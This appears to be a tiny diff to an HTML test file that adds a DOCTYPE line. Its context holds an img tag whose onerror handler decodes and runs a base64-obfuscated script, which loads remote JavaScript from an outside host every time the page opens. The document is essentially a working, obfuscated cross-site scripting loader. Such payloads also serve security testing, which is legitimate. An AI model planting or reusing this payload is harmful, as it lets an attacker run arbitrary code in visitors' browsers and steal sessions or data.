--- a/test.html
+++ b/test.html
@@ -1,3 +1,4 @@
+<!DOCTYPE html>
 <html>
  <body>
    <img src=x onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPSdodHRwczovLzB4LmF4L3oxOGc/JytNYXRoLnJhbmRvbSgp'))>
